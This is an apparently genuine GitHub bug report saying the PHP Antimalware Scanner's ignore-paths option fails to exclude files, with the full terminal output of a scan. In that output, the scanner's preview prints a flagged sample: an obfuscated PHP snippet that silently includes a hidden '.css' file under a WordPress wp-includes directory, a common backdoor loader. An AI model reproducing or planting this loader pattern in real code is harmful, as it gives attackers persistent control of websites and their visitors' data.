Ignore-path has no effect #116

Open
@kepon85

Hello

Version 0.14.0

It seems to me that the ignore(s)-path has no effect. Here's why I say that:

I would have thought that the files in "ignore path" were ignored, but that doesn't seem to be the case. Of course I tried to put them individually, change the quotes, without wildcard...

root@srvweb:~# mkdir /tmp/dirtest
root@srvweb:~# cp /opt/scripttest/test.php /tmp/dirtest/test.php
root@srvweb:~# php /opt/PHP-Antimalware-Scanner/scanner -l --ignore-paths="/tmp/dirtesttest.php,test.php,*test.php,/*test.php" /tmp/dirtest/

         █████╗ ███╗   ███╗██╗    ██╗███████╗ ██████╗ █████╗ ███╗   ██╗         
        ██╔══██╗████╗ ████║██║    ██║██╔════╝██╔════╝██╔══██╗████╗  ██║         
        ███████║██╔████╔██║██║ █╗ ██║███████╗██║     ███████║██╔██╗ ██║         
        ██╔══██║██║╚██╔╝██║██║███╗██║╚════██║██║     ██╔══██║██║╚██╗██║         
        ██║  ██║██║ ╚═╝ ██║╚███╔███╔╝███████║╚██████╗██║  ██║██║ ╚████║         
        ╚═╝  ╚═╝╚═╝     ╚═╝ ╚══╝╚══╝ ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═══╝         
                                                                                
        Github: https://github.com/marcocesarato/PHP-Antimalware-Scanner        

                                 version 0.14.0                                 

                                                                                
                            PHP Antimalware Scanner                             
                           Created by Marco Cesarato                            
                                                                                

Agile mode enabled
Start scanning...
Scan date: 2024-11-14 16:21:00
Scanning /tmp/dirtest

Mapping and retrieving checksums, please wait...


Verifying files checksum...

[===============================] 100%  1/1 [0 sec/0 sec]

Found 1 files to check

Checking files...

[>                              ] 0%  0/1 [0 sec/0 sec]


PROBABLE MALWARE FOUND!
/tmp/dirtest/test.php

=================================== PREVIEW ====================================

  1 | <?php
  2 | /*92e78*/
  3 | 
  4 | $rdpnv0 = "/var/www/chute/web/wp\x2dincludes/blocks/post\x2daut\x68or\x2dbiograp\x68y/.5397785d.css"; if (!isset($rdpnv0)) {strrev ($rdpnv0);} else { @include_once /* 185 */ ($rdpnv0); }
  5 | 
  6 | /*92e78*/

================================================================================

Checksum: 675edd52709681efd3936bfec5887fc7
File path: /tmp/dirtest/test.php

Evil code found: 
[!] Exploit (infected_comment) [line 2]
    - Comments composed by 5 random chars usually used to detect if a file is infected yet
      => /*92e78*/

OPTIONS:

    [1] Delete file
    [2] Move to quarantine
    [3] Dry run evil code fixer
    [4] Dry run evil line code fixer
    [5] Open with vim
    [6] Open with nano
    [7] Add to whitelist
    [8] Show source
    [-] Ignore


amwscan > What is your choice?  

Thanks,
David
